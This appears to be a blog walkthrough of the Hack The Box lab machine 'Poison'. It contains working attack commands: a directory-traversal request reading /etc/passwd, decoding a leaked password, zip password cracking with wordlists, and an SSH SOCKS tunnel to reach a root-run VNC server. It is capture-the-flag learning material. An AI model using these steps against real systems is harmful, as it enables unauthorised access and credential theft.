Poison

Poison HTB

Enumeration Stage

Service/Port Scan

NMAP (network mapper)

The nmap reveals two services running on port 22 (ssh) and port 80 (HTTP). Apache FreeBSD 2.4.29.

$ nmap -sV -sC -p- -o poison.txt 10.10.10.84                  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 06:00 EDT
Nmap scan report for 10.10.10.84
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Web Application

Overview

We are greeted by a temporary website that is used to test some local scripts. So, let’s test them 🙂

Functionalities test

I am going to test each functionality for hints, security gaps etc… In the process of poking the application I discovered a password backup file from the listfiles.php and a directory traversal attack vector under file=

# curl http://10.10.10.84/browse.php?file=listfiles.php                                                           1 ⨯
Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)
# curl http://10.10.10.84/browse.php?file=pwdbackup.txt                                                         130 ⨯
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

I have wrote a short loop bash script to decrypt the password and got:

Charix!2#4%6&8(0

A browse.php file that expects value for its variable file introduces vulnerability called directory traversal and provides access to other sensitive files.

The down below command dumps the contents of /etc/passwd file which contains all available users on the system.

$ curl http://10.10.10.84/browse.php?file=../../../../../../../../../../../../etc/passwd                       2 ⨯
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

Now that we have a valid user and a valid password – we’re in!

Privelege Escalation

Foothold
# ssh [email protected]                                                                                        255 
Password for [email protected]:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!
...[snip]...
[email protected]:~ % 
Enumeration – Files/Writeable/SUID

I have discovered a password protected zip file. Opened an HTTP server and transferred the file to my local kali machine to crack it.

[email protected]:~ % ls
secret          secret.zip      user.txt

[email protected]:~ % unzip secret.zip
Archive:  secret.zip
 extracting: secret |
unzip: Passphrase required for this entry

[email protected]:~ % python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.14.2 - - [14/May/2021 13:36:22] "GET /secret.zip HTTP/1.1" 200 -
Cracking Secret

Trying to crack the pwd protected file proven a bit frustrating until I realised I did not reuse the password for charix…

# zip2john secret.zip > passtocrack.hash                                                                         82 ⨯
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/english.txt' secret.zip                                              130 ⨯

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/realhuman_phill.txt' secret.zip

──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' secret.zip                                                1 ⨯

┌──(root💀kali)-[/home/kali]
└─# fcrackzip -u -D -p '/usr/share/wordlists/fasttrack.txt' secret.zip 

┌──(root💀kali)-[/home/kali]
└─# unzip secret.zip  
Archive:  secret.zip
[secret.zip] secret password: 
password incorrect--reenter: 
 extracting: secret    

Looking at the file I see that it is probably a binary file which content makes no sense but since the file was protected and hidden he may be the “secret” to something to come.

┌──(root💀kali)-[/home/kali]
└─# file secret                                 
secret: Non-ISO extended-ASCII text, with no line terminators

# hexdump -C secret
00000000  bd a8 5b 7c d5 96 7a 21                           |..[|..z!|
00000008
Process Enumeration

I have discovered an interesting process called Xvnc. Xvnc is a Vitrual Network Computing server and its used as remote desktop connection, runs as root and it has open ports 5901 and 5801.

[email protected]:~ % ps aux all
....[snip]....
root     529   0.0  0.9  23620  8872 v0- S    11:45     0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/cla
....[snip]...

[email protected]:~ % sockstat -l |grep Xvnc
root     Xvnc       529   0  stream /tmp/.X11-unix/X1
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
Accessing the VNC

Good explanation on how we can access it is given in the following intro to ssh tunneling. However shortly put – I am checking for the proxychains local port in order to redirect the ssh connection through it in order for me to access the vnc locally with a password phrase “secret” from the unzipped file.

┌──(root💀kali)-[/home/kali]
└─# cat /etc/proxychains4.conf

...[snip]...
socks4  127.0.0.1 9050
...[snip]...

┌──(root💀kali)-[/home/kali]
└─# ssh [email protected] -D 9050
Password for [email protected]:
[email protected]:~ % 

┌──(root💀kali)-[/home/kali]
└─# proxychains vncviewer 127.0.0.1:5901 -passwd secret                                 

And we’ve done it. Such a nice box. The owner of the box made the mistake to host functionalities which introduce huge plethora of security issues. Then, he also made the mistakes to not only reuse his password but also store it in a file on his local computer. To sum it up – We have learned a little bit about tunneling, proxychains, dir traverse and Xvnc.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: